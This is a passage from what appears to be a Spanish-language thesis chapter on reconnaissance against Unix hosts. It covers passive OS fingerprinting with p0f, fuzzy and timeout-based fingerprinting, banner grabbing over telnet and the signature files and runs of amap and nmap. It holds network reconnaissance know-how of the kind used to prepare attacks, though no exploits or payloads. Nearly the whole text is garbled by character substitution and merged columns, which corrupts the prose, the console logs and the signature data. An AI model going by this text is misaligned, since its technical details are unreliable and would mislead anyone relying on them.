5ado que los "aquetes ,K@ no requieren est) ulo "revio de ningGn ti"o ;es
*.* ,itio del !ro'ecto =one'net% $tt"%&&"roject.$one'net.org& *.2 =erra ientas !asivas de ?, Finger"rinting% $tt"%&&III.netIor6intrusion.co.u6&os/".$t *.- ,i bien /ue uno de los "ri eros en i "le entar /inger"rinting "asivo# ,i"$on es una $erra ienta 'a en desusoH su 4eb es% $tt"%&&si"$on.datanerds.net *.1 Etterca" es una $erra ienta que "uede utilizarse "ara di/erentes tareas ' ta bin inclu'e un 8dulo "ara $acer /inger"rinting "asivo. 2<:% $tt"%&&etterca".source/orge.net& *.5 ,itio 4eb de !.F% $tt"%&&lca tu/.coredu ".c9&"./.s$t l Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +2 de 22O

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

decir# de ninguna $erra ienta># es l8gico su"oner que s-lo escuc9ando D>esni=eando?E por paquetes ANN en la red se puede dilucidar qu A0 ejecuta cada I4 con la que se tiene contacto . 5e a$) surge el no bre de Cpassive fingerprintingD# 'a que si con la tcnica anterior ;/inger"rinting activo> era necesario enviarle "aquetes a un $ost "ara evaluar c8 o res"onde# con ste todo s8lo es necesario "onerse a Cescuc$arD el tr/ico ' co "robar si los "aquetes detectados tienen caracter)sticas es"ec)/icas de un ,? o no. ,in e bargo# est claro que sigue siendo necesaria una base de datos con los fingerprints o C/ir asD conocidas# relacionadas con los "ar etros que los di/erencian. :a docu entaci8n de "./ ' ta bin otras /uentes ; S,ECU4A<T#
SF7@PU!A,T>

coinciden en que las

tricas que caracterizan a los ,?s a este nivel#

' en este caso# son entre otras% Fa aBo Fotal de !aquete 7nicial ;7! _ FC!> Encabezado 7!%

FF: 7nicial en el encabezado 7! Bit de C@o Frag entaci8nD 7! Fa aBo M9i o de ,eg ento FC! ;/SS> ?"ci8n de Escala iento de la Lentana FC! ;%S&4>3>*.J Fi esta " en las ?"ciones de FC!*.+ Fa aBo de Lentana FC! ;%indo. Si$e> ACRs ,electivos !er itida o no ;S4&<>*.O Bits de @o ?"eraci8n FC! ;G?P>

Encabezado FC!%

:a secuencia de los "ar etros corres"ondientes a los ca "os o"cionales de FC! ;/SS, S4&<, G?P 1 %S&4>3>. !./ en "articular indica ' al acena en su base de /ir as algo s de

*.J :a o"ci8n de escala iento de ventanas "er ite de/inir ta aBos de ventana FC! de/inida en el <FC *-2-# "g. O% $tt"%&&tools.iet/.org&$t l&r/c*-2-c"age(O

a'ores que

los J55-J b'tes que el ca "o %indo. Si$e del encabezado FC! original. Esta o"ci8n est *.+ El ti esta " sirve "ara que un lado de la cone9i8n "ueda calcular el <FF de la cone9i8n# con el /in de descartar seg entos CviejosD du"licados# en un ecanis o lla ado !A4,. Est de/inido ta bin en el <FC *-2-# "g. *+% $tt"%&&tools.iet/.org&$t l&r/c*-2-c"age(*+ *.O :a o"ci8n ,ACR de FC! est docu entada en el <FC 2.*O% $tt"%&&tools.iet/.org&$t l&r/c2.*O Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +- de 22O

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

in/or aci8n que el listado de arriba# co o se "uede ver en la Consola @ro *-. All) lo que se "uede ver es la base de /ir as ,K@# que es la que alguna odalidad tradicional ' la ejores resultados brinda. :a desventaja de esto es que $a' que lograr de anera que el objetivo inicie cone9iones con el equi"o que est ejecutando u' di/)cil.

"./# lo cual segGn las circunstancias# "uede ser

marcelo@saturno:~$ u7o !at ;et!;p0f;p0f.fp N Bingerprint entrE format: N N >>>>:ttt:):ss:444...:HH:4-:)etails N N >>>> - >in7o> iOe 9!an be Q or Snnn or .DD or TDD: N V.nnV 9mu"tip"e of 3..: an7 VTnnV 9mu"tip"e of 3TK: are a""o>e7. N ttt - initia" TT2 N D - 7onJt fragment bit 90 - not et4 1 - et: N - o@era"" ./N pa!6et iOe 9Q 'a a pe!ia" meaning: N OOO - option @a"ue an7 or7er pe!ifi!ation 9@ariab"e- ee be"o>: N RR - quir6 "i t 9@ariab"e- ee be"o>: N O. - O. genre 92inuD4 .o"ari 4 &in7o> : N 7etai" - O. 7e !ription 9(.0.(7 on D)64 et!: ?...@ ----------------- 2inuD ------------------?...@ .+:6+:1:60:3Q4.4T4N4&5:.:2inuD:(.6 9ne>er4 1: .+:6+:1:60:3Q4.4T4N4&6:.:2inuD:(.6 9ne>er4 (: .+:6+:1:60:3Q4.4T4N4&7:.:2inuD:(.6 9ne>er4 3: T+:6+:1:60:3Q4.4T4N4&7:.:2inuD:(.6 9ne>er4 +: ?...@ ----------------- .o"ari ----------------?...@ .3+:6+:1:5(:3Q4N4&04N4N4.:.:.o"ari :10 9beta: 3()50:6+:1:6+:3Q4N4N4T4N4&14N4N4.:.:.o"ari :10 91(03*: 3()50:6+:1:6+:3Q4N4&14N4N4T4N4N4.:.:.o"ari :9.1

Consola *-% Arc$ivo de Finger"rints ,K@ de "./

A "artir de la versi8n 2..# "./ incor"or8

s /uncionalidad# co o "or

eje "lo la detecci8n de ,?s basado en /inger"rints de "aquetes ,K@_ACRs# de <,F_ ;<,F o <,F_ACR> ' de cone9iones establecidas ;s8lo con ACRs>. Esto "er ite que uno "ueda iniciar cone9iones nor al ente# co o si la Cintenci8nD del usuario /uera ser cliente del servicio que corre en el objetivo# ientras "./ interce"ta el ,K@_ACR e in/or qu ,? coincide con la /ir a recibida. Algo si ilar sucede en el caso de la detecci8n basada <,F_# salvo que el "uerto del objetivo est cerrado. 5e todas de anlisis dis inu'en en buena aneras# las "osibilidades de 9ito con estos ti"os edida ;en el <EA5ME*.0 de "./# secci8n ** el

autor detalla ' co "aran los di/erentes ti"os de anlisis>.


*.0 El arc$ivo <EA5ME de la $erra ienta con una descri"ci8n de sus caracter)sticas ' o"ciones de ejecuci8n "uede encontrarse en% $tt"%&&lca tu/.coredu ".c9&"./&<EA5ME Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +1 de 22O

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

AGn as)# ' sin i "ortar el ti"o de detecci8n utilizado# lo interesante de esta tcnica ' que le a"orta uc$o valor es su capacidad de pasar casi totalmente uestra una odo ,K@ "or desaperci(ida por el 9ost que es anali3ado . En la Consola *1 se ejecuci8n de "./ en un $ost que "osee la 7! *02.*JO...-. en el bastante alta.
?root@ciclon ~@A p0f -i em0 p0f - pa i@e o fingerprinting uti"itE4 @er ion (.0.) 9,: 3. Ua"e> 6i T"!amtufI7ione.!!>4 &. .tearn T> tearn IpoboD.!om> p0f: "i tening 9./N: on Jem0J4 (6( ig 91+ generi!4 !6 um 0B1B5,#(:4 ru"e: Ja""J. 19(.16).0.(:+7706 - 2inuD (.6 9ne>er4 3: 9up: +1 'r : -> 19(.16).0.30:(( 97i tan!e 04 "in6: et'ernet;mo7em: 19(.16).0.(0:(+)09 - OpenC.D 3.0-3.9 9up: 7(67 'r : -> 19(.16).0.30:(( 97i tan!e 04 "in6: et'ernet;mo7em: 19(.16).0.100:10(5 - 2inuD (.( 9(: 9up: 0 'r : -> 19(.16).0.30:(( 97i tan!e 04 "in6: et'ernet;mo7em: 19(.16).0.33:5)061 - KN5NO&N -65535:6+:1:60:31+604N4&34.4T:.:*:*0 9up: 135 'r : -> 19(.16).0.30:)0 9"in6: et'ernet;mo7em: W,PPP <Diting on igna" ( PPP -P0 #@erage pa!6et ratio: 0.65 per minute. ?root@ciclon ~@A

de/ectoH varios $osts se conectaron a di/erentes servicios ' la tasa de 9ito /ue

Consola *1% Eje "lo de ejecuci8n de "./

:as Gnicas di/erencias a"reciables son que la versi8n real de ?"enB,5 era la 1.2 en vez de -.0# ' que la cone9i8n de un FreeB,5 +.. no /ue identi/icada. !ara ningGn cliente $ubo actividad Csos"ec$osaD o di/erente a la nor al.

5.*.-. ?tras tcnicas de Finger"rinting


Ade s de que e9iste so/tIare que co bina detecci8n de un ,iste a ?"erativo re oto de /or a activa ' "asiva# e9isten ta bin otras tcnicas% 2in)erprintin) Di=uso% Es una variante que /ue i "le entada en el so/tIare Cpro(e ;versiones * ' 2># desarrollado "or F'odor Karoc$6in# Meder R'd'raliev ' ?/ir Ar6in**.. ,e basa en un /inger"rinting activo# "ero ca bia su algorit o de detecci8n# 'a que involucra coincidencia de =irmas di=usa con el =in de a)re)arle inteli)encia a la detecci-n H es decir# razona con valores en una l8gica di/usa# co o KE,# 5evuelve resultados !<?BAB:KUKE,# !<?BAB:KU@? ' @?.
**. ,itio 4eb de A"robe% $tt"%&&s's(securit'.co &blog&9"robe2& Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +5 de 22O

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

"robabil)sticos ' "er ite varias coincidencias si ultneas# "ero coincide con sus ancestros en que necesita de una base de datos de /ir as ' al enos un "uerto abierto ' un "uerto cerrado en el destino "ara realizar el test en condiciones 8"ti as. :a ventaja de este todo es que es s resistente a las condiciones del :os autores ta bin uc$o s "reciso entorno que "ueden a/ectar a las "ruebas deter inistas# co o "or eje "lo routers# /ireIalls# de oras en el tr/ico# etc. ***. a/ir an que env)an enos "aquetes a la red ' que es

que @ a" ' que cualquier otra $erra ienta de detecci8n de ,? re oto.

Detecci-n por Timeouts de T/4GI4% Fa bin lla ado <7@P**2 "or ?livier Courta'# Franc6 Le'sset ' ?livier =een# que "ublicaron un "a"er donde desarrollaron una tcnica basada en el clculo de los ti eouts FC!&7! del $ost ;S<7@PU?,F@PT#S<7@PU?,T> al "rogra adores en qu valores utilizar. :a idea es si "le% s8lo se env)a a un "uerto abierto un Gnico ,K@# ' "osterior ente se contabiliza la cantidad ' la de ora entre los di/erentes ,K@_ACR que env)a el destino tratando de iniciar la cone9i8n. Fa bin se tiene en cuenta la a"arici8n de un <,F luego de algunas res"uestas. 5e esta es el anera se logran identi/icar los di/erentes ,?s# ' lo interesante es que )ni o "osible% un Gnico "aquete. :a desventaja es que en el es bastante di/)cil de detectar# 'a que no es tr/ico CinusualD ' su cantidad C undo realD# es "robable que los tie "os se alteren "or dis"ositivos inter edios ' se obtengan resultados incorrectosH "or otra "arte# es"erar "or ti eouts "uede ser un "roceso u' lento ' tedioso. u' "eligroso ' no tan s Cnuevo> "or /ronolo)6a de Fxploits% Es un test que "uede ser conocidos en orden coronol8gico ;del o ento de iniciarse la cone9i8n. Esta es otra rea donde los <FC dan libertad a los

Gtil a /ines "rcticos. ,i "le ente consiste en enviar al objetivo e9"loits s CviejoD a /uerza bruta# $asta que el siste a e/ectiva ente caiga. Ka que el e9"loit segura ente est relacionado con una versi8n o versiones bastante es"ec)/icas del ,?# en algunos ; u' raros> casos "uede considerrselo
*** !ara s docu entaci8n ;"a"ers# "resentaciones# etc.> sobre Finger"rinting 5i/uso# visitar el siguiente enlace% $tt"%&&s's(securit'.co &blog&"ublis$ed( aterials& **2 <7@P% Acr8ni o de :emote 6dentification, Gext @eneration H 7denti/icaci8n <e ota# @ueva Peneraci8n. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +J de 22O

Ca")tulo 5. ( 5.*.5etecci8n del ,iste a ?"erativo% ?, Finger"rinting

co o alternativa.

5.2. Enu eraci8n de ,ervicios


:uego de la eta"a de deter inar el ,iste a ?"erativo re oto# el o(jetivo es poder determinar =e9acientemente qu Ao=t@are est ejecutando el 9ost destino ' cul est abierto a tr/ico de red# o al al 9i o. :a enu eraci8n# a di/erencia del escaneo de "uertos que se e9"lic8 anterior ente# es una eta"a donde se interactGa directa ente con la ca"a de a"licaci8n en vez de la del ,iste a ?"erativo# a "esar de que esta interacci8n deje inevitable ente rastros. ,in e bargo# 'a que la $acerse "asar "or un cliente etodolog)a s co Gn es s del servicio# cualquier 75,# siste a de enos reducir el argen de error

onitoreo# /ireIall# etc. no notar ninguna di/erencia de asiado evidente entre un intruso intentando detectar la versi8n del so/tIare que brinda el servicio con un cliente nor al del is o.

5.2.*. Banner Prabbing


5anner @rabbing))0 es el no bre que se le da a la interacci8n objetivo de obtener la anual# en te9to "lano# del usuario en /or a directa contra el servicio a analizar# con el a'or in/or aci8n "osible. En dic$a cone9i8n general ente el servidor in/or a no bre del servicio o del so/tIare# versi8n ' $asta ca"acidades inclu)das o caracter)sticas inclu)das en tie "o de co "ilaci8n. Esto se ve /acilitado "orque los "rotocolos que se "rogra as cliente relativa ente "recarios# en co andosH "or este anejan actual ente ' ediante son estandares en 7nternet /ueron desarrollados cuando los equi"os ejecutaban odo te9to e interactivos otivo es co Gn que la interacci8n consista en si "les s adecuados**1 "ara $acer 5anner
ejor

co andos "ara ordenarle al servicio que realice tal o cual tarea. ,i bien $a' "rogra as que son

**- :a traducci8n literal es CCa"tura de FitularesD# aunque a"licado a la tcnica una traducci8n "odr)a ser CCa"tura de EncabezadosD. **1 @etcat es

s adecuado que Felnet "ara $acer este ti"o de cosas# "or as"ectos tcnicos ' s

"orque est casi tan e9tendido co o Felnet. Ler Consola 2. en la "g. O0 "ara e9a inar un eje "lo# ' este enlace% $tt"%&&en.Ii6i"edia.org&Ii6i&FelnetcCurrentUstatus que contiene in/or aci8n sobre los "roble as de asu ir que Felnet equivale a una cone9i8n CcrudaD ;ra.>. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. ++ de 22O

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

@rabbing# el "rogra a cliente de Felnet ;S47R7UFE:@EFT> es el so/tIare ubicuo "or e9celencia "ara conectarse a cualquier $ost%"uerto FC! e interactuar Ca con el servicio que aloja el server re oto.
marcelo@saturno:~$ te"net 19(.16).0.100 (1 TrEing 19(.16).0.100... ,onne!te7 to t unami. < !ape !'ara!ter i JW0J. ((0 rI62 +2* ser<er !Jersion >u&2.6.0!1" Gon +eb 28 10: 0: 6 C-2 2000" rea7E. F-C/ anonEmou 331 Hue t "ogin o64 en7 Eour !omp"ete e-mai" a77re a pa >or7. *%-- anonIte t.!om (30 Hue t "ogin o64 a!!e re tri!tion app"E. KC7* (1+-T'e fo""o>ing !omman7 are re!ogniOe7 9Q 1>J unimp"emente7:. K.<$ PO$T .TO$ 3.#3Q $NTO N2.T 35D ,DKP ?...@ !sigue" (1+ Dire!t !omment to root@localIost. -8-2 (15 F9IE 2Dpe: 78 -2%2 (11-r'6( BTP er@er tatu : Jersion >u&2.6.0!1" Gon +eb 28 10: 0: 6 C-2 2000 ,onne!te7 to 19(.16).0.( ?...@ !sigue" (11 <n7 of tatu *L) (57 V;V i !urrent 7ire!torE. HFI2 ?...@ sigue ((1 Hoo7bEe. ,onne!tion !"o e7 bE foreign 'o t. marcelo@saturno:~$ te"net 19(.16).0.100 (5 TrEing 19(.16).0.100... ,onne!te7 to t unami. < !ape !'ara!ter i JW0J. ((0 localIost.localdomain C-G2* -endmail 8.9. /8.9. # T'u4 3 #pr (00) 1):(7:53 -0+00 J/+8 root 210 root Mroot@localIost.localdomain' J/+8 a7min 550 a7min... K er un6no>n HFI2 ((1 "o!a"'o t."o!a"7omain !"o ing !onne!tion ,onne!tion !"o e7 bE foreign 'o t. marcelo@saturno:~$ te"net 19(.16).0.30 (( TrEing 19(.16).0.30... ,onne!te7 to !i!"on. < !ape !'ara!ter i JW0J. --K&2.0&4pen--KN..1p1 +ree(-)&20061110 ,onne!tion !"o e7 bE foreign 'o t. marcelo@saturno:~$

anoD

Consola *5% ,esi8n de Banner Prabbing con Felnet

En la Consola *5 se

uestra una si "le sesi8n de 5anner @rabbing.

ediante un cliente telnet !ri ero se "uede a"reciar la in/or aci8n que "ublican los servicios de FF! ' de ,MF! ;res"ectiva ente> del $ost *02.*JO...-.# ' luego
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +O de 22O

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

se establece una cone9i8n con el servicio de ,,= en el $ost *02.*JO...-.. :o escrito "or el intruso est en negrita# ' la in/or aci8n Gtil est resaltada en color rojo. El $ost Ctsuna iD evidente ente est ejecutando una versi8n <ed =at ;J.2># ' entre otras cosas est de ail es vlida en ese servidor o no. u' vieja de u' descuidado% su servidor ,MF! "er ite

la ejecuci8n del co ando L<FK# que contesta ;sin autenticarse> si una direcci8n

5.2.2. Finger"rinting de A"licaciones


E9isten $erra ientas que se orientan a a"licar las tcnicas de /inger"rinting activo de ,?s "ero "ara a"licaciones ' servicios es"ec)/icos ;S:?PUMAPUA!!F7@PT# SA<FUA!!F7@PT>. :a ventaja de esta eje "lo%

anera de encarar el

"roble a es que evita "osibles inconvenientes del banner grabbing# co o "or ,i el intruso Cse to"aD con un ad inistrador "recavido# es "robable que $a'a con/igurado el so/tIare "ara que de in/or aci8n# $acindolo al usuario.

uestre la

enor cantidad "osible

enos CverborrgicoD ;verbose> e in/or ativo odi/icado el nG ero de "uerto en

Fa bin cabe la "osibilidad que $a'a

el que atiende "eticiones el servicio# utilizando uno di/erente a las convenciones**5 '&o con/iguraciones "or de/ecto. !or eje "lo# un ,ervidor 4eb# que t)"ica ente aguarda "or cone9iones en el "uerto O.# "uede encontrarse en el "uerto O.O..

7ncluso ta bin "udo $aber

odi/icado el no bre de un so/tIare "or

otroH "or eje "lo# $acer que un ,ervidor ,MF! ,end ail O.9 se identi/ique al cliente co o un !ost/i9 2.1.

!or Glti o# $a' "rotocolos que

anejan la in/or aci8n en /or a binaria o

**5 :a

a'or)a de las relaciones C@G ero de !uerto ae ,ervicioD los asigna el 7A@A ; 6nternet

4ssigned Gumbers 4ut orit1>H stas se consideran se i(estndares ;'a que son una reco endaci8n a seguir# no una obligaci8n># de/inida "or un i "ortante ente de 7nternet# que controla los 5@,s ra)z ' las 7!s asignadas# "or eje "lo. !ara ver un listado de los "uertos ' servicios reconocidos "or el 7A@A# ver este enlace% $tt"%&&III.iana.org&assign ents&"ort( nu bers. ,in e bargo# esto no i "ide que se "ueda $acer caso o iso de esta reco endaci8n. !or otro lado# e9isten servicios no enu erados en el listado ' que sin e bargo se conoce qu "uerto utilizan ;aun "roducindose colisiones de nG eros de "uerto en algunos casos>. Ms in/or aci8n% $tt"%&&en.Ii6i"edia.org&Ii6i&:istUo/UFC!UandU25!U"ortUnu bers Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +0 de 22O

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

encri"tada# con lo cual la interacci8n v)a telnet se $ace casi i "osible. !or estos otivos el /inger"rinting# al compro(ar un comportamiento

t6pico ! conocido de una aplicaci-n% (rinda ms se)uridad en los resultados o al menos una instancia adicional para 9acer las compro(aciones previas de un posi(le ataque. 2na de las $erra ientas s "o"ulares**J ;' que se dedica 8dulo de detecci8n e9clusiva ente a esta labor> es A a"**+# junto ;otra vez> a @ a"# que ade s del /inger"rinting de ,iste as ?"erativos ta bin cuenta con un de versiones de servicios.

5.2.2.*. A a"
A a" "osee dos arc$ivos de /ir asH uno de triggers ;o Cdis"aradoresD> lla ado Ca""de/s.trigD ' otro de res"uestas conocidas no brado co o Ca""de/s.res"D. El "ri ero corres"onde a secuencias de b'tes o strings ;cadenas de te9to> a enviar a"enas se establece una cone9i8n ;en el caso de FC!>. El segundo "ertenece a las res"uestas de a"licaciones conocidas# ' "ueden estar relacionadas a un trigger o no# 'a que $a' servicios&"rotocolos en donde el servidor env)a un string o un conjunto de b'tes al cliente en "ri era instancia. Es decir# una res"uesta "uede ser generada "or un Cest) uloD en la cone9i8n a"enas iniciada ;el trigger> o recibida in ediata ente sin enviar nada. En la Consola *J se quizs uestra el /or ato de arc$ivo de triggers de A a" uestran triggers de los servicios junto con algunos eje "los. :os "ri eros tres

s co unes# co o son =FF!# ,MF! ' FF! ' se encuentran en /or ato

ascii ;te9to "lano>. !ara los tres Glti os ;5@, genrico en "uertos FC!&25! ' 5@, Bind**O> es necesario un trigger binario. Con la utilizaci8n de triggers binarios# 'a "uede a"reciarse la ventaja de usar este ti"o de $erra ientas a co "araci8n de telnet o netcat Ca anoD.

**J Enlace con algunos escneres de a"licaciones% $tt"%&&sectools.org&a""(scanners.$t l **+ ,itio Ieb de A a"% $tt"%&&/reeIorld.t$c.org&t$c(a a"&. =ace algGn tie "o que no se actualiza ni se ven "rogresos en el desarrollo# co o s) sucede con @ a". **O Bind es la i "le entaci8n del so/tIare de servidor s "o"ular ' $asta "odr)a decirse que de re/erencia del "rotocolo 5@,. 2<:% $tt"%&&III.isc.org&inde9."lY&sI&bind&inde9."$" Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O. de 22O

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios


N T'i i t'e trigger fi"e Vapp7ef .trigV for amap N N 2o Trigger tienen e" formato iguiente: N N N#3<:-,O33ONAPO$T4-,O33ONAPO$T4...00:-8PAP$OTO,O20:0F1:T$8HH<$A.T$8NH N N N#3< <" nombre 7e" trigger ?...@ N ,O33ONAPO$T - 9op!iona": e pe!ifi!a en quX puerto e ta ap"i!a!i%n N u ua"mente e en!uentra ?...@ N 8PAP$OTO,O2 - 9op!iona": %"o en@iar e te trigger i e" proto!o"o o N e" puerto obYeti@o e igua" a" proto!o"o 7eifini7o N aquZ4 t!p o u7p. Por 7efe!to on ambo . N ?#$3BK2 .i e te trigger pue7e romper o interrumpir N ap"i!a!ione 4 !onfigure e to en V1V4 ino V0V. N T$8HH<$ 2o 7ato 7e" trigger en Z4 para en@iar a "o puerto . N Pue7e e pe!ifi!ar"o en 7o manera : N 1: Kn tring a !ii en!erra7o entre !omi""a VV4 o N (: Kn tring 'eDa7e!ima" en!abeOa7o por V0DV ?...@ N <Yemp"o : 'ttp-get:)04)14)(4)0004)0)04)0)14)))):t!p:0:VH<T ; ?TTP;1.0[r[n[r[nV mtp:(5:t!p:0:V?<2O #3#P[r[nV ftp:(1:t!p:0:VK.<$ #3#P[r[nV 7n :53:u7p:1:0D00 00 10 00 00 00 00 00 00 00 00 00 7n :53:t!p:1:0D00 0! 00 00 10 00 00 00 00 00 00 00 00 00 7n -bin7:53:u7p:1:0D00 06 01 00 00 01 00 00 00 00 00 00 07 76 65 7( 73 69 6f 6e 0+ 6( 69 6e 6+ 00 00 10 00 03

Consola *J% For ato del arc$ivo de Friggers de A a" ;traducido del ingls>
N T'i i t'e re pon e fi"e Vapp7ef .re pV for amap N N 2a $e pue ta tienen e" iguiente formato: N N N#3<:-T$8HH<$4-T$8HH<$4...00:-8PAP$OTO,O20: -38NA2<NHT?43#GA2<NHT?0:$<.PON.<A$<H<G N N N#3< <" nombre que imprime amap i "a 7efini!i%n !oin!i7e N !on "a re pue ta re!ibi7a 7e" er@i!io N T$8HH<$ 9op!iona": $equiere que "o 7ato re!ibi7o 'aEan i7o N "a re pue ta 7e un trigger !on e te nombre en N app7ef .trig. Pue7e eparar @ario !on una !oma. N 8PAP$OTO,O2 \ 9op!iona": $equiere que "a re pue ta re!ibi7a @enga @Za N e" proto!o"o t!p o u7p. Por 7efe!to on ambo . ?...@ N 2<NHT? 9op!iona": <" mZnimo E m]Dimo "argo 7e "a re pue ta N re!ibi7a4 epara7o por una !oma o un ^ni!o n^mero ?...@ N $<.PON.< < ta e una eDpre i%n regu"ar 7e Per" 9man per"re: que N er] e@a"ua7a en "o 7ato re!ibi7o N <Yemp"o : ?...@ 7n -bin79:7n -bin7:u7p::W...-[D00-[D7e0..........................[D!0 7n -bin7):7n -bin7:u7p::W...-[D00-[D7e0.......................... -W[D!00 7n -7Yb:7n -bin7:u7p::W...-[D)0-[D)30.Q@er ion.bin7 ?...@ 'ttp-apa!'e-1::t!p::W?TTP;.Q[n.er@er: #pa!'e;1 'ttp-apa!'e-(::t!p::W?TTP;.Q[n.er@er: #pa!'e;( ?...@ tftp::u7p::W[D00-[D03[D050[D00

Consola *+% For ato del arc$ivo de <es"uestas de A a" ;traducido del ingls>

:uego# en la Consola *+# se "ueden observar algunas res"uestas reconocidas


Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O* de 22O

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

"or la base de /ir as# co o "or eje "lo las relacionadas con los triggers de 5@, vistos "revia ente# unas res"uestas que t)"ica ente el servidor Ieb A"ac$e devuelve a los clientes ;no relacionado con ningGn trigger># ' una res"uesta a un "aquete 25! enviado a un servidor FFF!. Este arc$ivo de res"uestas conocidas razonable ente e9cede la cantidad de triggers conocidos# 'a que varias res"uestas "ueden estar asociadas a un trigger o a ningunoH lo ideal ser)a que cada res"uesta identi/ique una o varias versiones de iguales o di/erentes servidores. El /unciona iento de A a" es sencillo# ' se "uede resu ir en los siguientes "asos S,A@,UAMA!T% 7. 7nicializaci8n# carga de arc$ivos de triggers# res"uestas# etc. +. ,e reciben# entre otros "ar etros de entrada# $ost destino ' "uertos FC!&25! a analizar. ;. ,e intenta establecer cone9iones en "aralelo con el $ost ' "uerto nor al ente ;siendo con/igurable la cantidad de cone9iones si ultneas>. <. !or cada cone9i8n iniciada correcta ente se env)a un trigger que no $a'a sido "robado. ,e env)an en orden secuencial# tal co o se encuentran en el arc$ivo de /ir as. . !or cada rece"ci8n correcta de datos# se co "rueba el arc$ivo de res"uestas ' se evalGa si $a' coincidencia o no. #. ,e i "ri en las res"uestas coincidentes.
marcelo@saturno:~/src/amap&1.2$ .;amap -@ 19(.16).0.30 (1(1 (( K ing trigger fi"e .;app7ef .trig ... "oa7e7 35 trigger K ing re pon e fi"e .;app7ef .re p ... "oa7e7 390 re pon e K ing trigger fi"e .;app7ef .rp! ... "oa7e7 +50 trigger amap @5.( 9>>>.t'!.org;t'!-amap: 3#PP8NH mo7e tarte7 at (00)-0+-06 13:51:59 -

Tota" amount of ta 6 to perform in p"ain !onne!t mo7e: 56 *rotocol on 192.168.0. 0:2121/tcp !bD trigger Ittp&get" matcIes 6tp *rotocol on 192.168.0. 0:22/tcp !bD trigger Ittp&get" matcIes ssI *rotocol on 192.168.0. 0:22/tcp !bD trigger Ittp&get" matcIes ssI& openssI &aiting for timeout on 1 !onne!tion ... Kni7entifie7 port : none. amap @5.( fini 'e7 at (00)-0+-06 13:5(:00 marcelo@saturno:~/src/amap&1.2$

Consola *O% Eje "lo de ejecuci8n de A a"# detectando un servicio FF! ' un ?"en,,=

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O2 de 22O

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

Entre otras caracter)sticas# A a" so"orta cone9iones ,,: ;que identi/ica correcta ente "or su ands ake> ' luego env)a los triggers co o si /uera una cone9i8n nor alH de esta anera# todos los triggers son Gtiles "ara cone9iones encri"tadas ta bin. En la Consola *O# A a" "uede identi/icar un servicio FF! a "esar de que est en un "uerto no estndar ;' que "revia ente se detect8 abierto con un "ort scanning>. !or Glti o es i "ortante notar que los "rotocolos ' servicios que env)an in/or aci8n inicial ;co o un 5anner> coincidirn sie "re con el trigger 9$tt"( getDH esto sucede "orque A a"# a"enas se establece la cone9i8n# env)a el "ri er trigger de la base de /ir as no enviado "revia ente. Esto "uede $acer que un ad inistrador detecte un co "orta iento e9traBo# 'a que en este caso "odr)a ver en los :ogs de co andos FF! ejecutados en el servidor un CPEF & =FF!&*..D# que corres"onde a un "rotocolo =FF!.

5.2.2.2. @ a"
@ a" en este as"ecto no di/iere de asiado en su co "orta iento con el A a"# salvo que su base de /ir as es Gnica ' est co unidad que lo rodea es aGn a costa de a sus usuarios. A lo largo de su ejecuci8n realiza un escaneo de "uertos estndar ;tal co o /ue descri"to en el ca")tulo anterior> '# quedndose con los "uertos abiertos# detecta los servicios de esta anera S@MA!UL,CA@T% s actualizada ;'a que la a'ores# ejor "a"el teniendo en a'or> ' sus ca"acidades ' "osibilidades son

a'or co "lejidad. Fa bin cu "le un

cuenta el objetivo de "asar desa"ercibido ' brindar

s in/or aci8n ' /le9ibilidad

7. Establece una cone9i8n con cada "uerto abierto. +. ,i se establece la cone9i8n sin "roble as# @ a" en "ri er lugar co ienza lo que se deno ina el CNull !robeD# que consiste en no enviar nada ' es"erar J segundos con la intenci8n de recibir datos. Aqu) es donde se conte "la a los servicios ' "rotocolos que env)an 5anners o in/or aci8n diversa in ediata ente luego de iniciarse la cone9i8n con el cliente. ;. ,i se reciben datos# se busca en el arc$ivo de /ir as una coincidencia relacionada con este probe.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. O- de 22O

Ca")tulo 5. ( 5.2.Enu eraci8n de ,ervicios

;.7.,i

$a'

coincidencia

co "leta

;CduraD**0

co o

describe

la

docu entaci8n># el servicio est identi/icado ' ter ina el anlisis de ese "uerto. ;.+.En algunos otros casos# "uede $aber una coincidencia "arcial o CblandaD# que s8lo logra identi/icar de qu servicio se trata. Entonces lo que $ace @ a" es continuar ;ir al "aso 1># con la es"eranza de obtener luego una coincidencia CduraDH "ero lo $ace restringiendo el conjunto de probes s8lo a aquellos que reconocen en /or a co "leta este servicio ;' no a todos>. ;.;.Fa bin "uede que no $a'a coincidencias con este C@ull ProbeD# "or lo que se va al "aso 1. <. Co o todav)a no se envi8 nada "or la cone9i8n# se dar prioridad en el anlisis a los probes que posean en su listado de puertos el n'mero de puerto destino de la conexi-n . Estos nG eros de "uertos de cada sentencia Probe sirven "ara indicar que el is o tiene s "robabilidades de 9ito con estos "uertos que con otros. !or eje "lo# el !robe Coracle( tnsD inclu'e en su listado de "uertos el *52*# 'a que el servicio F@, :istener de ?racle es alta ente "robable que se encuentre escuc$ando en dic$o "uerto. @ueva 